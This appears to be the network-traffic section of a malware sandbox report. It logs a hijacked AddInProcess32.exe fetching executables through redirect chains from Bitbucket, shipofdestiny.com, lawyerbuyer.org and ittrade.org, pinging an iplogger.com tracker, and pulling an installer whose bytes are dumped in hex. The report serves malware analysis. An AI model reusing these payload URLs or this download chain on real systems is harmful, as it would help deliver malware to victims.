                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPBAVIWijFGV3DZnLb9lL3zPtJ8gLF2YiACXgxHBy3eIFErycxYx5YPqDgO1rJuJ3WPHhzcgByX7bIZD0GZgEUZtq0C5odS8I5BYQ5eySIcxiVWRbyCf77yIvOGKQ7Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628200fed8d0add-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            12192.168.2.555568104.192.141.144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC107OUTGET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: bitbucket.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC4235INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                                                                            x-usage-quota-remaining: 998923.634
                                                                                                                                                                                                                                                            vary: Accept-Language, Origin
                                                                                                                                                                                                                                                            x-usage-request-cost: 1093.87
                                                                                                                                                                                                                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            x-b3-traceid: cdfe773aebaabd3e
                                                                                                                                                                                                                                                            x-usage-output-ops: 0
                                                                                                                                                                                                                                                            x-used-mesh: False
                                                                                                                                                                                                                                                            x-dc-location: Micros-3
                                                                                                                                                                                                                                                            content-security-policy: base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            x-usage-user-time: 0.032816
                                                                                                                                                                                                                                                            x-usage-system-time: 0.000000
                                                                                                                                                                                                                                                            location: https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            x-served-by: 0e7b622335b4
                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 71
                                                                                                                                                                                                                                                            content-language: en
                                                                                                                                                                                                                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                            x-b3-spanid: cdfe773aebaabd3e
                                                                                                                                                                                                                                                            x-static-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-render-time: 0.060658931732177734
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-usage-input-ops: 0
                                                                                                                                                                                                                                                            x-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-request-count: 3743
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            13192.168.2.555575172.67.188.17844344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC67OUTGET /1lyxz HTTP/1.1
                                                                                                                                                                                                                                                            Host: iplogger.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC1146INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            set-cookie: 505282792584766758=3; expires=Tue, 11 Mar 2025 02:30:55 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                            set-cookie: clhf03028ja=154.16.105.38; expires=Tue, 11 Mar 2025 02:30:55 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                            memory: 0.42150115966796875
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:55 +0000
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ToL073Rcs3YTrTnhHbgXO4WVBFHTlgf8sII%2B9z89lt8YBsrNcCb3v2VZEzvwyZquB%2FogWK7oNKSnKgpf1MQpnnOxXmApniVhY%2FbRxTYlIZMB6YN%2BhD3Z0Am5Mit%2BXpc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201139ed09ed-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC218INData Raw: 64 34 0d 0a 0a 57 61 72 6e 69 6e 67 3a 20 55 6e 64 65 66 69 6e 65 64 20 70 72 6f 70 65 72 74 79 3a 20 64 65 76 69 63 65 3a 3a 24 75 61 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 6c 69 62 73 2f 64 65 76 69 63 65 2e 63 6c 61 73 73 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 37 35 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: d4Warning: Undefined property: device::$ua in /home/www/loggers/libs/device.class.php on line 75PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            14192.168.2.555572104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC103OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC705INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3mdwQfSn3sIeONCq36VrfNfxZE9QOFqz744rPa3AXqHSXbyGkCl2q%2BEQt4BPImJNUQ%2FsEbE%2BchLmYj2Rt7KyGJFKC01R9UJ35qhknF3M7%2Fe0i6UwcYCvLy%2BFKmrW0QzheOJE2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820128fc30ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            15192.168.2.555571104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC103OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC703INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LJ0mzSaRNkSoepLcvuDuZ%2Fy8D8KBgFXFeHRqS5Hpb5iGLBlhmJSEACHqUx2PK0LwOTv9A2RZp%2BmQECykplwEVfVVlcvcQkRKnNEKdRFF8dRH5ggZqza8drqlHtmg%2FjUMfBb%2FjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820128df709f3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            16192.168.2.555580107.167.110.21144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC135OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=OperaSetup.exe
                                                                                                                                                                                                                                                            ETag: "ec88d954c697b2110ec5b86a8d0a21d7"
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16062INData Raw: 61 34 64 0d 0a 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 03 00 fd 65 e5 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 80 2c 00 00 90 00 00 00 60 26 00 40 ea 52 00 00 70 26 00 00 f0 52 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 53 00 00 02 00 00 9f 4d 2d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 70
                                                                                                                                                                                                                                                            Data Ascii: a4dMZx@x!L!This program cannot be run in DOS mode.$PELee",`&@Rp&R@SM-@p
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 68 14 28 83 c2 b8 ed 04 89 65 c6 fa ff c1 80 e1 b0 89 55 d0 80 f9 20 74 10 25 35 f8 eb 1b e8 63 d2 f2 89 55 d4 59 7d a9 89 7d a5 41 ae ae ef 0e 98 76 45 88 8d 75 dc 02 56 9a 34 a3 fa 5d 02 36 c7 45 cc 00 05 53 40 ae 70 0d 55 f6 7e e9 85 03 82 95 55 56 e8 dd fd 63 e9 74 7d 8b 5d dc 81 fb 38 08 0f 85 31 f1 50 64 6a 57 58 45 cd 89 29 fe df 19 ca 8d 6a b8 89 f9 50 8b 7d d0 57 3e f5 ff ff ff e0 01 e8 83 c0 88 8b 55 d4 89 d1 29 f1 39 fa 8d 4c 0d 88 0f 44 c8 0f be 55 14 ae eb 4d d0 75 10 ea 88 50 ff 75 69 08 9d 58 9b 20 58 3a ed 33 f7 1c 87 33 14 1d 14 18 a5 ac ff ff 4f 54 03 95 91 56 8d 45 b9 89 c2 0f b6 40 ff 83 f8 2b 0f 84 01 ee 6f fa 1d fd 83 f8 2d 0f 84 f8 14 83 7d e0 02 0f 8c ec 09 46 4d b8 a6 3c 4e e4 07 7d b9 2b 8e 1b 02 18 b8 8d 55 ba 69 13 f5 ef fa 8f
                                                                                                                                                                                                                                                            Data Ascii: h(eU t%5cUY}}AvEuV4]6ES@pU~UVct}]81PdjWXE)jP}W>U)9LDUMuPuiX X:33OTVE@+o-}FM<N}+Ui
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: b3 16 b8 00 00 03 d0 23 d8 3b d8 75 1e 47 ba e1 6f c0 14 2e b9 23 c2 3b c2 75 0d 83 b2 ba 81 4d 1c 40 89 79 5d 04 c4 33 c0 c9 53 a7 af 6b 58 40 03 39 ba 0c 6b a6 33 71 53 b2 03 6d 22 70 64 6b c2 3f c3 ee bf 8b 44 24 10 89 6c 24 10 8d 03 2b e0 e0 97 10 31 82 81 e1 ff 45 fc 33 c5 50 89 65 e8 ff 75 f8 a4 4e 7f 40 c0 1b c0 8d 45 f0 64 25 c3 cc c2 dd f1 e9 ef 00 00 3b 79 10 75 01 c4 0f 5e 9d 81 ec 1c 81 0d 29 c9 c9 b7 38 5e 10 3c 84 5f f7 ff 5e 0c 89 15 00 05 5e 08 89 1d 05 04 b1 5e 00 72 de bd fb 7b fc 66 8c 18 28 66 8c 52 5e 1c 66 8c 20 5d f8 66 8c 77 c3 3f fe c0 f4 66 8c 9e f0 66 8c 2d 89 ec 9c 8f 14 f8 33 7d 78 5e 20 8b 45 19 5e 14 6d 5e 18 8d 45 76 ae 6f 0a 5b 5e 24 8b 85 e4 15 c5 5e 18 22 ea 23 ec 17 5d 1c 48 10 09 04 00 1e 00 4c fc 0f 5d 14 43 34 5d b9
                                                                                                                                                                                                                                                            Data Ascii: #;uGo.#;uM@y]3SkX@9k3qSm"pdk?D$l$+1E3PeuN@Ed%;yu^)8^<_^^^r{f(fR^f ]fw?ff-3}x^ E^m^Evo[^$^"#]HL]C4]
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 2d 75 05 83 cb 44 47 e2 ff 02 eb 05 83 fe 2b 75 09 0f b7 31 0e 0c c7 44 dc c0 57 da 3a e5 b8 10 ff 7a 43 40 5d 9d f8 3b c7 45 f4 6a 5d e4 d8 1b 1f c7 45 f0 f0 06 ec fa ab 86 e4 d8 1b fa ba c7 45 e4 70 64 c7 45 e0 e6 06 dc f0 c8 b1 37 74 d8 66 c5 c7 45 d4 70 06 d0 e6 b1 37 74 e4 cc f0 c8 66 bf c7 45 c4 70 06 23 c7 de d0 c0 66 71 c7 45 bc 70 06 b8 e6 b4 f7 d8 ef 91 f0 b0 66 0d 84 ac 70 06 a8 50 0e 0d 1e 39 72 ec a4 5a 06 a0 d0 9c da 98 20 0f c7 7e 8f fd 1b 94 2a 06 90 40 10 0d 8c 4a 06 88 e0 00 dc 63 bf 17 0d 84 ea 06 80 10 18 0d 11 50 ec 83 ef 1a 09 d4 df 70 d7 4a 1a ec 6a 30 5a 71 09 83 ff 10 0f 85 e2 10 dd 00 df 2d 66 3b f2 0f 82 af 66 3b b5 77 74 07 0d a6 73 ce c6 2b c2 96 7f 98 66 36 76 53 f0 3b f0 0f 83 0e 8b 55 f8 27 3e 30 fe c9 d8 3f 75 f4 72 db 8b
                                                                                                                                                                                                                                                            Data Ascii: -uDG+u1DW:zC@];Ej]EEpdE7tfEp7tfEp#fqEpfpP9rZ ~*@JcPpJj0Zq-f;f;wts+f6vS;U'>0?ur
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 0f b7 8d 32 25 19 8f a4 fb 01 83 f9 74 75 2a 16 34 66 75 fb 4d 50 f1 13 66 39 95 9b 75 0a 66 83 bd 38 1f 8b 88 9f bb 00 74 29 09 12 2d 0f be c0 99 fe dc 20 17 0f 85 d6 b9 1a 08 0c 99 aa b3 e8 ec 0a a2 03 9a b8 ef eb 0d 06 b2 bb 20 19 c0 f9 37 59 f8 10 27 b8 20 e8 c7 85 d1 6d 8d e3 ff 14 08 6a f9 e0 33 c0 66 39 06 74 24 b8 7c 86 c7 ff f1 39 85 88 73 17 57 56 50 ff b5 4e 23 aa 19 ef 0e 57 5e 75 55 eb 0b 62 4f 72 01 fc 37 8b 85 3b 11 53 ff 83 e4 3e fd 75 10 8b 00 ff b5 5a 89 01 32 35 75 1d 7c 12 fe 22 eb 04 33 c0 8b d8 d7 f9 b0 8b c3 02 5f 98 26 23 88 5e a9 33 41 91 72 e0 1c e4 34 e2 c0 9b f5 ff ff 53 33 db 56 8b f3 39 5d 10 7e 22 57 8d 7d 10 8d 7f 04 ff 37 50 24 26 fe 8f b1 a1 fd 6d 75 0b 46 3b 75 10 7c e3 5f 5e 25 74 58 47 47 e1 53 6a 02 40 56 f8 8f 25 db
                                                                                                                                                                                                                                                            Data Ascii: 2%tu*4fuMPf9uf8t)- 7Y' mj3f9t$|9sWVPN#W^uUbOr7;S>uZ25u|"3_&#^3Ar4S3V9]~"W}7P$&muF;u|_^%tXGGSj@V%
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 55 d8 8b 14 c2 44 eb 09 41 89 4d d4 3b 4e 0c 72 b8 7b 82 fb c0 52 56 6a 00 61 48 33 db 9e 21 5d fc 10 45 83 60 05 b6 c7 7f 25 bc 8b 7f 9c 4f a1 8b c3 ab 08 8b 5d e4 8b c0 0d ee 0d 36 4d 0c 89 41 f2 2b 01 1f d5 0e e1 07 07 0d 13 c8 89 48 1e c4 e6 49 01 61 d9 4b 83 77 67 44 c1 45 81 a5 12 08 21 05 93 1d fd 9b e6 19 74 09 22 75 2a 83 7d c0 00 75 24 5b 20 fc 8e 1b 0c 8b 3a 1c 60 59 f6 13 83 7d bc 00 0f f5 dd 58 14 09 56 15 1b ba 59 59 c3 ac 22 78 70 a8 f8 00 db 61 45 c1 ff 36 83 78 10 03 75 30 81 57 ff 06 ea 1f 15 83 78 1c 00 75 da 4c 31 33 c9 41 89 48 20 67 08 70 14 99 c4 49 43 fd 40 40 83 77 75 0c 57 c7 2f fe 86 0a af 8b 3e 33 db 85 ff 7e 36 ca f1 bf e1 8b d3 89 17 40 1c 89 45 ec 8b 40 0c 8b 08 60 80 4d 86 fe bd 45 e4 8b 09 31 f4 89 30 98 fa bb 54 7e 38 8b
                                                                                                                                                                                                                                                            Data Ascii: UDAM;Nr{RVjaH3!]E`%O]6MA+HIaKwgDE!t"u*}u$[ :`Y}XVYY"xpaE6xu0WxuL13AH gpIC@@wuW/>3~6@E@`ME10T~8
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: a9 a0 1c 54 0d d2 0b fe dd ee 83 c1 04 14 75 de 55 ff 83 cf 01 85 ff 75 1e 47 54 7f e8 bf fc 50 68 0b 00 00 20 eb 25 b2 f8 03 7d 05 f6 9f 23 78 b5 3b 6e 0f bf 59 eb f3 26 4c b8 a8 08 b9 62 8f 35 2c 2a 15 d5 c9 eb d4 61 45 34 02 6f 83 53 1b e8 90 8b 60 89 af 09 50 ee df 23 80 6a 94 29 74 16 6a 09 13 38 04 34 14 8d 02 5e d1 48 11 1c 27 c1 4d 1d c5 96 04 30 4c 1b 33 0a de 55 d5 d2 85 5d c0 5d c3 0f ee 77 ff 23 af 66 83 f8 41 72 06 05 5a 76 09 83 c0 9f 08 25 2c 18 ff 19 77 03 42 eb e2 8b c2 b6 80 00 f4 18 d0 a6 53 d8 08 57 89 ff 7f 15 d4 f0 02 c7 8d 7d f0 89 45 ec 33 c0 ab ab ab 14 fc 86 0c c9 f0 4d f0 33 d2 89 88 88 fa 27 76 a6 8d 8e d4 8b 45 ec 89 30 8e a2 8e 9a e5 0f 9b 1f 3f f7 a1 86 ff 1a a1 00 04 9e 94 57 48 50 70 9d 22 b4 8b 24 88 a8 9d 01 73 38 55 f0
                                                                                                                                                                                                                                                            Data Ascii: TuUuGTPh %}#x;nY&Lb5,*aE4oS`P#j)tj84^H'M0L3U]]w#fArZv%,wBSW}E3M3'vE0?WHPp"$s8U
